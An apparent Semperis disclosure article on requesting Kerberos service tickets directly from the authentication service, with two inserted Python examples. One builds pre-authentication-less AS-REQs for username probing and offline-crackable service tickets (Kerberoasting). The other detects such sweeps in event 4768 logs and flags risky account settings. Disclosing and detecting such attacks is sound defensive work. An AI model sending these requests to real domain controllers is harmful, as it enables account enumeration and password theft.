Semperis uncovers a new attack path - AS requested service tickets

September 2022 by Semperis

Semperis, a pioneer in identity security, is disclosing a vulnerability that could open a path to Kerberoasting and other attacks.

Semperis security researcher Charlie Clark has demonstrated that it is possible to request service tickets (STs) directly from the authentication service (AS), rather than from the ticket-granting service (TGS) as in the normal Kerberos flow.

The ability to request STs from the AS has several consequences, including new attack paths, detection bypasses, and potential weakening of security controls.

These issues were reported to Microsoft in May; Microsoft's response was that the behaviour is "considered to be by design."

However, the behaviour is never required in normal operations. The ability to circumvent current detections and perform effective attacks, like Kerberoasting, from an unauthenticated position is a serious issue that should not be ignored.

The issue can lead to new attack paths and has the potential to lead to even more vulnerabilities in the future. This research, along with Microsoft’s response, demonstrates the need for continuous monitoring and proper hardening measures.

Key points from the research:

Machine-account authentication service requests (AS-REQs) are sent unarmoured. Kerberos armouring (FAST) uses the device's ticket-granting ticket (TGT) as the armour key to protect a user's authentication service exchange with the KDC; the computer has no TGT before its own authentication service exchange, so that exchange is not armoured. The user's TGT is then used to protect the user's TGS exchanges with the KDC.

In a typical Kerberos flow, a session key is issued with every ticket, and this is an important feature for this research. The session key is returned to the requesting account in an encrypted part of the response, encrypted with a key the requestor already knows: the account's long-term key for an AS-REP, or the TGT session key for a TGS-REP.

The part of the Kerberos flow this research focuses on is the AS-REQ/AS-REP exchange, which is normally used only to request a TGT. Even with Kerberos Flexible Authentication Secure Tunneling (FAST) enforced, machine accounts still send their AS-REQs unarmoured.

Kerberoasting is a method to recover the plaintext password or NT hash of a service account, generally a user account with a service principal name (SPN), by offline cracking. For this method, access to the session key is not required. Only the resulting ST is needed, or more precisely the encrypted part of the ST, which is encrypted with the target service account's key rather than the requesting account's key.

A list of usernames can be generated in several ways, including user enumeration through null sessions on a DC, building a list from open-source intelligence (OSINT), or guessing likely usernames. Any list of candidate usernames can then be verified by sending an AS-REQ without pre-authentication for each one: an unknown name receives a KDC_ERR_C_PRINCIPAL_UNKNOWN error, a valid account that requires pre-authentication receives KDC_ERR_PREAUTH_REQUIRED, and a valid account that does not require pre-authentication receives an AS-REP containing a TGT.
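The two requests at the heart of this research, the unauthenticated username probe above and the AS-REQ whose sname names a target account instead of krbtgt (the AS-requested service ticket), as an added example. This is not code from the article or from Semperis's research: it is a minimal DER encoder for the AS-REQ of RFC 4120 section 5.4.1 plus a reader for the KDC's answer. It never contacts a KDC; the realm EXAMPLE.LOCAL, the account names and the KRB-ERROR it constructs for itself are all made up.

```python
# Added example, not code from the article or from Semperis: a minimal DER
# encoder for the Kerberos AS-REQ (RFC 4120, 5.4.1) and a reader for the KDC
# reply. It never contacts a KDC; realm and account names are made up.
import struct
from datetime import datetime, timezone

KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # client principal does not exist
KDC_ERR_PREAUTH_REQUIRED = 25     # account exists and needs pre-authentication
NT_PRINCIPAL, NT_SRV_INST = 1, 2  # PrincipalName name-types
FORWARDABLE, RENEWABLE, CANONICALIZE = 0x40000000, 0x00800000, 0x00010000

# DER primitives: definite lengths, non-negative INTEGERs only.
def der_len(n):
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body
def der_tlv(tag, body):
    return bytes([tag]) + der_len(len(body)) + body
def ctx(n, body):   # context-specific constructed tag [n]
    return der_tlv(0xA0 | n, body)
def app(n, body):   # APPLICATION constructed tag [n]
    return der_tlv(0x60 | n, body)
def der_int(v):     # a leading zero byte where needed keeps the sign bit clear
    return der_tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big"))
def der_seq(*items):
    return der_tlv(0x30, b"".join(items))
def gstr(s):        # KerberosString = GeneralString (tag 27)
    return der_tlv(0x1B, s.encode())
def gtime(dt):      # KerberosTime, e.g. 20370913024805Z
    return der_tlv(0x18, dt.strftime("%Y%m%d%H%M%SZ").encode())
def kflags(bits):   # KerberosFlags: 32-bit BIT STRING, bit 0 is the MSB
    return der_tlv(0x03, b"\x00" + struct.pack(">I", bits))

def principal(name_type, *parts):
    return der_seq(ctx(0, der_int(name_type)),
                   ctx(1, der_seq(*[gstr(p) for p in parts])))

def build_as_req(cname, realm, sname, nonce=0x12345678, etypes=(23, 18, 17),
                 till=datetime(2037, 9, 13, 2, 48, 5, tzinfo=timezone.utc)):
    """AS-REQ with no padata, i.e. no pre-authentication. The only thing that
    distinguishes a TGT request from a service-ticket request is sname [3]."""
    body = der_seq(ctx(0, kflags(FORWARDABLE | RENEWABLE | CANONICALIZE)),
                   ctx(1, principal(NT_PRINCIPAL, cname)),
                   ctx(2, gstr(realm)),
                   ctx(3, sname),
                   ctx(5, gtime(till)),
                   ctx(7, der_int(nonce)),
                   ctx(8, der_seq(*[der_int(e) for e in etypes])))
    return app(10, der_seq(ctx(1, der_int(5)), ctx(2, der_int(10)), ctx(4, body)))

def tgt_request(user, realm):
    """The normal AS exchange; sent without padata it is also the username probe."""
    return build_as_req(user, realm, principal(NT_SRV_INST, "krbtgt", realm))

def as_requested_st(no_preauth_user, realm, *target):
    """sname names another account (or an SPN given as its parts), so the AS
    returns a ticket encrypted to that account's key, crackable offline."""
    name_type = NT_SRV_INST if len(target) > 1 else NT_PRINCIPAL
    return build_as_req(no_preauth_user, realm, principal(name_type, *target))

def read_tlv(buf, pos=0):
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln

def krb_error_code(msg):
    """KRB-ERROR is [APPLICATION 30] SEQUENCE {...}; error-code is field [6]."""
    _, seq, _ = read_tlv(msg)
    _, fields, _ = read_tlv(seq)
    pos = 0
    while pos < len(fields):
        tag, val, pos = read_tlv(fields, pos)
        if tag == 0xA6:
            return int.from_bytes(read_tlv(val)[1], "big")
    raise ValueError("KRB-ERROR without error-code")

def classify_probe_reply(msg):
    """What the KDC's answer to a pre-auth-less AS-REQ tells the sender."""
    if msg[0] == 0x6B:                      # [APPLICATION 11] AS-REP: ticket issued
        return "valid, pre-authentication not required"
    if msg[0] == 0x7E:                      # [APPLICATION 30] KRB-ERROR
        code = krb_error_code(msg)
        return {KDC_ERR_C_PRINCIPAL_UNKNOWN: "unknown account",
                KDC_ERR_PREAUTH_REQUIRED: "valid, pre-authentication required",
                }.get(code, f"KRB-ERROR {code}")
    raise ValueError("not a KDC reply")

def sample_krb_error(code, realm="EXAMPLE.LOCAL"):
    """Constructed KRB-ERROR standing in for a real KDC reply (offline demo)."""
    return app(30, der_seq(ctx(0, der_int(5)), ctx(1, der_int(30)),
                           ctx(4, gtime(datetime(2022, 9, 1, tzinfo=timezone.utc))),
                           ctx(5, der_int(0)), ctx(6, der_int(code)),
                           ctx(9, gstr(realm)),
                           ctx(10, principal(NT_SRV_INST, "krbtgt", realm))))
```

`tgt_request("probe.user", "EXAMPLE.LOCAL")` and `as_requested_st("nopreauth.user", "EXAMPLE.LOCAL", "svc_sql")` differ only in the sname field, which is the whole point: the AS applies no check that sname is krbtgt, and the second message carries no credentials at all when the named client account has "Do not require Kerberos preauthentication" set. `classify_probe_reply(sample_krb_error(KDC_ERR_PREAUTH_REQUIRED))` shows how the probe tells an existing account from an unknown one.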

AS-REQs without pre-authentication do not produce a Windows event unless the account does not require pre-authentication, in which case a ticket is issued. With the list of usernames and the name of one account that does not require pre-authentication, the attack can be launched: AS-REQs are sent in the name of that account with each target name as the requested service name (sname), and the AS returns STs encrypted with the targets' keys. The resulting tickets can then be used for offline password cracking.
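Two checks a defender can run against the conditions this attack needs, as an added example that is not from the article or from Semperis: which accounts carry the "Do not require Kerberos preauthentication" flag, and which 4768 (TGT requested) events on a domain controller show the AS issuing a ticket for a service other than krbtgt. The directory records and event records are constructed here; in practice they come from an LDAP query on userAccountControl and from the DC security log. One assumption is not stated on the page: that a ticket the AS issues for a non-krbtgt sname is logged as event 4768 with that name in the Service Name field.

```python
# Added example, not from the article or Semperis: defender-side checks over
# records that would normally come from LDAP (userAccountControl) and from the
# DC security log (event 4768). All records below are constructed. Assumption
# not stated on the page: a ticket the AS issues for a non-krbtgt sname is
# logged as 4768 with that name in the Service Name field.
from collections import defaultdict

UF_DONT_REQUIRE_PREAUTH = 0x400000  # userAccountControl bit for "Do not require Kerberos preauthentication"
PREAUTH_NONE = 0                    # 4768 Pre-Authentication Type 0: logon without pre-authentication
RC4_HMAC = 0x17                     # 4768 Ticket Encryption Type for rc4-hmac

ACCOUNTS = [  # constructed directory records (0x10200 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD)
    {"sAMAccountName": "alice",      "userAccountControl": 0x10200},
    {"sAMAccountName": "legacy.app", "userAccountControl": 0x10200 | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "svc_sql",    "userAccountControl": 0x10200},
    {"sAMAccountName": "svc_backup", "userAccountControl": 0x10200},
]

EVENTS = [  # constructed 4768 records: one normal TGT request, then a sweep of AS-requested STs
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.5"},
    {"EventID": 4768, "TargetUserName": "legacy.app", "ServiceName": "svc_sql",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.99"},
    {"EventID": 4768, "TargetUserName": "legacy.app", "ServiceName": "svc_backup",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.99"},
    {"EventID": 4768, "TargetUserName": "legacy.app", "ServiceName": "alice",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.0.0.99"},
]

def accounts_without_preauth(records):
    """Accounts an attacker can name as the requesting account without any credentials."""
    return sorted(r["sAMAccountName"] for r in records
                  if r["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)

def as_issued_service_tickets(events):
    """4768 records whose Service Name is not krbtgt: the AS issued something
    other than a TGT, which is never needed in normal operation."""
    return [e for e in events
            if e["EventID"] == 4768 and e["ServiceName"].lower() != "krbtgt"]

def roast_sweeps(events, threshold=2):
    """Group AS-issued STs by (source IP, requesting account). Several distinct
    targets from one source, with no pre-authentication, look like Kerberoasting
    from an unauthenticated position."""
    targets = defaultdict(set)
    for e in as_issued_service_tickets(events):
        if e["PreAuthType"] == PREAUTH_NONE:
            targets[(e["IpAddress"], e["TargetUserName"])].add(e["ServiceName"])
    return {k: sorted(v) for k, v in targets.items() if len(v) >= threshold}
```

The first check is the hardening item: every name returned by `accounts_without_preauth` is a ready-made requesting account for this attack, and clearing the flag removes the unauthenticated path. The second is the detection: `roast_sweeps(EVENTS)` groups the three constructed events from 10.0.0.99 into one alert, with the requested names listing which accounts' keys an attacker now holds ciphertext for.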

